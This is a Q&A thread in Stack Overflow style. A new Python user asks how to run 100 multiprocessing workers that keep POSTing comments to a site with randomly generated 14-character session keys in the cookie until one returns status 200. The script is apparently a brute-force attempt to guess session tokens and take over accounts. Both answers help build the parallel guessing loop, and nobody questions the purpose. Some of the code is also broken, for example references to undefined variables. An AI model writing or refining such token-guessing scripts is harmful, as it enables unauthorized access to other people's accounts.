# python multiprocessing workers till response 200

Tags: python, multithreading, multiprocessing

good day, I am new in python, i've tried my best to build code below:

```
import http.client
import random
import string
import multiprocessing

def worker():
    """worker function"""
    if res.status == 200:
        print("Valid key found: " + key + " Got status: ", + res.status)
    elif res.status == 302:
        print("invalid key! " + key + "!")
    return

def randomStringDigits(stringLength=6):
    """Generate a random string of letters and digits """
    lettersAndDigits = string.ascii_letters + string.digits
    return ''.join(random.choice(lettersAndDigits) for i in range(stringLength))

key = randomStringDigits(14);

conn = http.client.HTTPSConnection("www.pra1ser.com", timeout=10)

payload = "comment_text=%40asnikuwait1%20test2&replied_to_comment_id="

headers = {
    'cookie': "md5=5; prm_124024574287414=base_domain=api.pra1ser.com; csrftoken=5es0TEJiV6JOOjEzqyAfyeyN1FtnRIi1; session=CVzZzZz%3A" + key + "%3A8;",
    'x-csrftoken': "5es0TEJiV6JOOjEzqyAfyeyN1FtnRIi1",
    'content-type': "application/x-www-form-urlencoded"
    }

conn.request("POST", "/web/comments/2050815839087051573/add/", payload, headers)

res = conn.getresponse()
data = res.read()

#print(data.decode("utf-8"))
#print(headers)
#print(res.status)

if __name__ == '__main__':
    jobs = []
    for i in range(100):
        p = multiprocessing.Process(target=worker)
        jobs.append(p)
        p.start()
```

I'd like to make it work multiprocessing with 100 workers infinite till it get response "200" from server, then it break.

I've tried while true, but i break the code, lot of errors. and i've tried to infinite loop but with failed attempt.

i wish somebody can helps me out please.

Thank you,
regards.
pra1

Answer (score 1):

When you are using multiprocess it is not necessary (and maybe could slow down the whole thing) to use a loop, the easiest way to implement the multiprocess you want would be with a `with` statement, I am not capable of trying this since I don't know the real site you are trying to get to but it should look something like this:

```
from concurrent.futures import ThreadPoolExecutor

... 
...

def worker(con):
    """worker function"""
    while res.status != 200:
        res = conn.getresponse()
        if res.status == 200:
            return "Valid key found: " + key + " Got status: ", + res.status
        elif res.status == 302:
            print( "invalid key! " + key + "!")

...

with ThreadPoolExecutor(max_workers=100) as pool:
        results = pool.map(worker, res)
```

Comment: Nope, still it doesn't meet my requirement. it doesnt work. I want to keep checking till it find valid key with status.response 200.

Comment: @jose-ange-sanchez try to make request to goolge for example. and you will see no response at all with your current code.

Answer (score 0):

```
#!/usr/bin/python
 import http.client
 import random
 import string
 import multiprocessing
 import sys
 import threading

 exitFlag = 0

def randomStringDigits(stringLength=6):
    """Generate a random string of letters and digits """
    lettersAndDigits = string.ascii_letters + string.digits
    return ''.join(random.choice(lettersAndDigits) for i in range(stringLength))

def worker(event):
    """worker function"""

    key = randomStringDigits(14)

    conn = http.client.HTTPSConnection("google.com", timeout=60)

    payload = "comment_text=%40asnikuwait1%20test2&replied_to_comment_id="

    headers = {
    'cookie': "md5=5; prm_124024574287414=base_domain=api.pra1ser.com; csrftoken=5es0TEJiV6JOOjEzqyAfyeyN1FtnRIi1; session=CVzZzZz%3A" + key + "%3A8;",
    'x-csrftoken': "5es0TEJiV6JOOjEzqyAfyeyN1FtnRIi1",
    'content-type': "application/x-www-form-urlencoded"
}

    conn.request("POST", "/web/comments/2050815839087051573/add/",
             payload, headers)

    res = conn.getresponse()

    if res.status == 200:
        print("Valid key found: " + key + " Got status: " + res.status)
        event.set()
    elif res.status == 302:
        print("invalid key! " + key + "!")
    else:
        print("invalid key! " + key + "!")

class myThread (threading.Thread):
    def __init__(self, threadID, event):
        threading.Thread.__init__(self)
        self.threadID = threadID
        self.event = event

    def run(self):
        worker(self.event)

if __name__ == '__main__':

    jobs = []
    max_threads = 10

    # Create Event
    event = multiprocessing.Event()

    # Create two processes
    while not event.is_set():
        for i in range(max_threads):
            thread = myThread(i, event)
            thread.start()
            jobs.append(thread)

        for i in jobs:
            i.join()

    # Check whether event is set or not
    # When set close all child processes
    while True:
        if event.is_set():
            # Terminating main process
            print('Exiting Process...')
            sys.exit(1)
```